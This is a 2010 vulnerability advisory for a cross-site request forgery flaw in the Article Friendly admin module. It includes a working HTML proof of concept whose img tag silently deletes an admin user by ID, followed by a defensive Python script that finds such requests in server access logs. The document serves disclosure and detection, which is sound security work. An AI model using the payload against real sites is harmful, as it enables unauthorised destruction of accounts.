Article Friendly – Cross-Site Request Forgery

  • Author: Pratul Agrawal
    Date: 2010-02-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11559/
  •  =======================================================================
    
     Article friendly CSRF Vulnerability
    
     =======================================================================
    
     by
    
     Pratul Agrawal
    
    
    
    # Vulnerability found in: Admin module
    
    # email Pratulag@yahoo.com
    
    # company aksitservices
    
    # Credit by Pratul Agrawal
     
    # Site page http://www.articlefriendly.com/
     
    # Platform php
     
    
    
    # Proof of concept #
    
    Targeted URL: http://server/admin/index.php?filename=adminlogin
     
    
    Script to delete the Admin user through Cross Site request forgery
     
     ...................................................................................................................
     
    <html>
    <body>
    <img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
    </body>
    </html>
     
     
     ...................................................................................................................
     
     
     
    After execution, refresh the page and you can see that the user with the given ID gets deleted automatically.
    
    
    #If you have any questions, comments, or concerns, feel free to contact me.
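
For defenders, one way to look for this request pattern in web server access logs, as an added example that is not part of the original advisory. It assumes Combined Log Format and that the site's own hostname is `server` as in the PoC URL; the function name `find_csrf_deletes` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

def find_csrf_deletes(lines, site_host):
    """Return GET hits on the advisory's adminuser&a=3 request whose Referer is not site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        q = parse_qs(url.query)
        if not url.path.endswith("/admin/index.php"):
            continue
        if q.get("filename") != ["adminuser"] or q.get("a") != ["3"]:
            continue
        # A foreign Referer means another site triggered the request. A missing
        # one ("-") is only a triage lead: referrer policies can strip it too.
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host != site_host:
            hits.append({"time": m["time"], "ip": m["ip"],
                         "adminid": q.get("adminid", [""])[0], "referer": m["referer"]})
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Feb/2010:10:01:02 +0000] "GET /admin/index.php?filename=adminuser&a=3&adminid=2 HTTP/1.1" 200 512 "http://blog.example.net/post.html" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Feb/2010:10:03:40 +0000] "GET /admin/index.php?filename=adminuser&a=3&adminid=5 HTTP/1.1" 200 512 "http://server/admin/index.php?filename=adminuser" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Feb/2010:10:04:11 +0000] "GET /admin/index.php?filename=adminlogin HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Feb/2010:10:09:00 +0000] "GET /admin/index.php?filename=adminuser&a=3&adminid=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_csrf_deletes(SAMPLE_LOG, "server"):
        print(hit)
```

Any hit also confirms that the application still performs the delete on a plain GET, which is the condition that lets an image tag trigger it.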